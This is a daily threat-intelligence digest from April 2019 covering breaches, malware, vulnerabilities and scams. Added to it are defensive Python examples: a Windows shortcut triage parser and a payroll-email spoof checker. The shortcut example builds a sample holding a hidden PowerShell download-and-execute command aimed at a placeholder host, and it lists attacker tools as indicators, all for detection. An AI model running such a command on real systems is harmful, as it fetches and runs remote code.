Cyware Daily Threat Intelligence, April 11, 2019

Exploiting vulnerabilities has long been a go-to attack vector for malicious actors. Security researchers have now disclosed a group of new vulnerabilities that affect the recently launched WPA3 Wi-Fi standard. Collectively dubbed ‘Dragonblood’, the flaws would allow an attacker within range of a victim’s network to recover the Wi-Fi password and infiltrate the network.

Intel has released a security advisory for the recently revealed ‘Spoiler’ attack, which leverages a weakness in Intel CPUs to leak secrets from memory and, unlike Spectre, is not a speculative execution side channel. The advisory describes the impact and CVE identifier of the vulnerability along with mitigation measures. The vulnerability is tracked as CVE-2019-0162 and scores 3.8 out of 10 on the CVSS severity scale.

Turning to malware, security experts have discovered a new variant of the Emotet trojan. The variant has infected a total of 176 users in Chile in an attempt to exfiltrate their financial credentials.

Top Breaches Reported in the Last 24 Hours

Mailgun’s WordPress site hacked
Email automation and delivery service Mailgun has suffered a cyber attack. The attack exploited an unpatched cross-site scripting (XSS) vulnerability in a WordPress plugin named ‘Yuzo Related Posts’. The vulnerability allowed the attackers to inject code into Mailgun’s WordPress site, which then redirected visitors to all sorts of spam pages. The company removed the plugin and was back in normal operation within two hours of detecting the problem.

Hacker steals credentials of dark web users
A US man named Michael Richo was found guilty in a Bitcoin phishing scheme designed to steal cryptocurrency and credentials from dark web users. Through the scheme, Richo stole more than $365,000 and made off with 10,000 usernames and passwords. He posted fake links on dark web forums that redirected users to phishing pages imitating the login pages of various dark web marketplaces.

Top Malware Reported in the Last 24 Hours

Privacy ‘Poisoning’ attack
A new type of attack known as Privacy ‘Poisoning’ can pose a major risk for companies using blockchain technology. An attacker can load unwanted data into a blockchain, putting the network in conflict with local laws. The attacker can load private data such as names, addresses and credit card numbers, or illegal material, into the blockchain, and because the ledger is designed to be immutable the data cannot simply be removed afterwards.

LimeRAT spotted in the wild
Cybercriminals are using an unusual infection chain that starts with an LNK (Windows shortcut) file to defeat traditional security defenses and spread LimeRAT. The malware has a set of powerful and dangerous capabilities, including infecting all files and folders on USB drives, using evasive startup methods to avoid detection, and downloading a keylogger module. It can also steal cryptocurrency wallets and passwords.
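An LNK-based chain like the one above is a reason to triage shortcut files before they reach users. The following is an added example, not code from this page or from any LimeRAT analysis: a minimal parser for the Shell Link (.lnk) header and StringData fields as laid out in Microsoft's MS-SHLLINK specification, plus a triage routine that flags shortcuts whose target is a living-off-the-land binary, whose arguments carry download-and-execute markers, or which launch with a minimized window. The indicator lists, the builder used to produce the sample shortcut, and the sample itself (with a placeholder example.invalid URL) are constructed for the demonstration and are not LimeRAT's actual loader.

```python
import struct

# Shell Link (.lnk) constants from MS-SHLLINK; the CLSID identifies the format.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C
FLAG_HAS_ID_LIST = 0x01
FLAG_HAS_LINK_INFO = 0x02
FLAG_HAS_NAME = 0x04
FLAG_HAS_RELATIVE_PATH = 0x08
FLAG_HAS_WORKING_DIR = 0x10
FLAG_HAS_ARGUMENTS = 0x20
FLAG_HAS_ICON_LOCATION = 0x40
FLAG_IS_UNICODE = 0x80
# StringData sections appear in this fixed order, each gated by its flag.
STRING_FIELDS = (
    (FLAG_HAS_NAME, "name"),
    (FLAG_HAS_RELATIVE_PATH, "relative_path"),
    (FLAG_HAS_WORKING_DIR, "working_dir"),
    (FLAG_HAS_ARGUMENTS, "arguments"),
    (FLAG_HAS_ICON_LOCATION, "icon_location"),
)
SW_SHOWMINIMIZED, SW_SHOWMINNOACTIVE = 2, 7

# Indicator lists are illustrative assumptions, not a vendor signature set.
LOLBINS = ("powershell", "cmd.exe", "mshta", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec")
ARG_MARKERS = ("-nop", "-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
               "iex", "invoke-expression", "downloadstring", "downloadfile",
               "frombase64string", "http://", "https://")


def parse_lnk(data: bytes) -> dict:
    """Parse the header, skip IDList/LinkInfo, and decode the StringData fields."""
    valid = (len(data) >= HEADER_SIZE
             and struct.unpack_from("<I", data, 0)[0] == HEADER_SIZE
             and data[4:20] == LNK_CLSID)
    if not valid:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = HEADER_SIZE
    if flags & FLAG_HAS_ID_LIST:            # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_HAS_LINK_INFO:          # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & FLAG_IS_UNICODE)
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return fields


def triage_lnk(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing stood out."""
    f = parse_lnk(data)
    target = (f.get("relative_path", "") + "|" + f.get("name", "")).lower()
    args = f.get("arguments", "").lower()
    findings = []
    for binary in LOLBINS:
        if binary in target:
            findings.append(f"target runs {binary}")
            break
    for marker in ARG_MARKERS:
        if marker in args:
            findings.append(f"argument marker {marker!r}")
    if f["show_command"] in (SW_SHOWMINIMIZED, SW_SHOWMINNOACTIVE):
        findings.append("launches with a hidden window")
    if len(args) > 200:
        findings.append("unusually long argument string")
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str, show_command: int = 1) -> bytes:
    """Build a minimal Unicode .lnk (no IDList/LinkInfo) so the demo runs offline."""
    flags = FLAG_HAS_RELATIVE_PATH | FLAG_HAS_WORKING_DIR | FLAG_HAS_ARGUMENTS | FLAG_IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3 (76 bytes).
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path) + string_data(working_dir) + string_data(arguments)
    return header + body + struct.pack("<I", 0)   # terminal ExtraData block


# Constructed sample resembling a loader shortcut; example.invalid is a placeholder.
MALICIOUS_SAMPLE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32",
    "-nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\"",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_SAMPLE = build_lnk(r"..\..\Windows\notepad.exe", r"C:\Windows", "")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage_lnk(blob) or ["no findings"])
```

Real shortcuts usually carry an IDList and LinkInfo, which the parser skips by size; the ExtraData blocks after the strings (environment variables, known folders) are left unparsed here but are worth inspecting too, since they can override the visible target.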

Emotet infects 176 Chileans
A new variant of the infamous Emotet trojan has been detected in a phishing campaign that infected a total of 176 users in Chile. The campaign ran between March 18 and March 26, 2019. The malware was distributed via malicious documents or URL links disguised as an invoice or PDF attachment.

HOPLIGHT backdoor trojan
The Department of Homeland Security and the Federal Bureau of Investigation have released a joint alert about a new malware strain dubbed HOPLIGHT, which they attribute to the notorious HIDDEN COBRA threat actor group. Once installed, the malware collects system information such as the OS version, volume information and system time. It can also inject malicious code into running processes.

Top Vulnerabilities Reported in the Last 24 Hours

Dragonblood vulnerability
The researchers who discovered the KRACK attack on WPA2 have also uncovered a set of vulnerabilities in the recently launched WPA3 Wi-Fi security standard. Dubbed ‘Dragonblood’, the vulnerabilities would allow an attacker within range of a victim’s network to recover the Wi-Fi password and infiltrate the target’s network.

CVE identifier for Spoiler Attack
Intel has assigned a CVE identifier to the recently disclosed ‘Spoiler’ vulnerability. It is tracked as CVE-2019-0162 and scores 3.8 out of 10 on the CVSS severity scale. Unlike Spectre v2, Spoiler is not a speculative execution side channel, but it could still be used to leak secrets such as passwords from memory.

PoC for a bug in Windows released
Security researchers have published proof-of-concept exploit code for a privilege escalation vulnerability affecting Windows systems. The vulnerability is designated CVE-2019-0841 and is triggered by improper handling of hard links by the AppX Deployment Service (AppXSVC). A local attacker with low privileges could use this bug to run processes with elevated permissions on Windows 10 and Windows Server 2019, including Server Core installations.

Top Scams Reported in the Last 24 Hours

Fake employee emails
New Zealand Police is warning business owners and payroll operators about a phishing scam in which scammers attempt to divert employees’ pay to accounts they control. The attackers create an email address in the name of a company employee and then email the payroll provider, asking for that employee’s bank account details to be changed. Once the change is made, the scammers receive the employee’s pay and can use the funds for further fraudulent transactions without the knowledge of the business or the employee.
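The payroll scam above hinges on a mismatch between a familiar display name and the address the request actually comes from. The following is an added example, not code from this page or from New Zealand Police: a check a payroll mailbox could run over each incoming request, comparing the From display name against a staff directory, the sender domain against the company domain, and Reply-To against From, and separately detecting bank-detail change language. The directory, the example.com domain, the phrase list and both sample messages are constructed for the demonstration.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed staff directory: normalised display name -> the address HR has on file.
# A real deployment would pull this from the HR or identity system (assumption).
COMPANY_DOMAIN = "example.com"
DIRECTORY = {
    "jane doe": "jane.doe@example.com",
    "sam lee": "sam.lee@example.com",
}
# Phrases that mark a request to change where pay is sent (illustrative list).
CHANGE_PHRASES = ("change my bank", "update my bank", "new account number",
                  "new bank details", "direct deposit", "change my account")


def normalise_name(name: str) -> str:
    return " ".join(name.lower().split())


def review_payroll_request(raw_message: str) -> dict:
    """Return identity anomalies and whether the mail asks to change bank details."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    display, addr = parseaddr(msg.get("From", ""))
    addr = addr.lower()
    reply_to = parseaddr(msg.get("Reply-To", ""))[1].lower()
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content().lower() if body is not None else ""

    anomalies = []
    known = DIRECTORY.get(normalise_name(display))
    if known and addr != known:   # the name is one of ours, the mailbox is not
        anomalies.append(f"display name {display!r} belongs to {known}, not {addr}")
    if addr and not addr.endswith("@" + COMPANY_DOMAIN):
        anomalies.append(f"sender domain is outside {COMPANY_DOMAIN}")
    if reply_to and reply_to != addr:   # replies would go somewhere else
        anomalies.append(f"Reply-To {reply_to} differs from From {addr}")
    change_request = any(p in text for p in CHANGE_PHRASES)
    return {"sender": addr, "anomalies": anomalies, "change_request": change_request}


def should_hold(raw_message: str) -> bool:
    """Hold for out-of-band verification when a change request carries any identity anomaly."""
    r = review_payroll_request(raw_message)
    return r["change_request"] and bool(r["anomalies"])


# Constructed messages for the demonstration; freemail.invalid is a placeholder domain.
SPOOFED = """\
From: Jane Doe <jane.doe.payroll@freemail.invalid>
Reply-To: jane.doe.payroll@freemail.invalid
To: payroll@example.com
Subject: Direct deposit update
Content-Type: text/plain; charset="utf-8"

Hi, I switched banks this week. Please update my direct deposit to the
new account number below before Friday's run. Account 00000000, sort code 00-00-00.
Thanks, Jane
"""

LEGITIMATE = """\
From: Jane Doe <jane.doe@example.com>
To: payroll@example.com
Subject: Direct deposit update
Content-Type: text/plain; charset="utf-8"

Please update my direct deposit to the new account number I gave HR in person today.
"""

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("legitimate", LEGITIMATE)):
        print(label, review_payroll_request(raw), "hold:", should_hold(raw))
```

Header checks of this kind are a triage aid, not proof: a legitimate request from a personal address will be held too, which is the intended outcome, since the fix the police advise is the same either way, confirming the change with the employee through a channel other than the email that requested it.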

New extortion email scam
A new extortion email scam in which scammers threaten to report recipients to the IRS for hiding tax documents has been doing the rounds lately. The fraudsters email the target claiming that their computer has been hacked and that secret documents related to income tax have been found on it. They then demand 2 Bitcoins in exchange for not revealing the documents to the IRS, and threaten that failure to pay will result in a DDoS attack on the recipient’s network or an infection with the WannaCry ransomware.
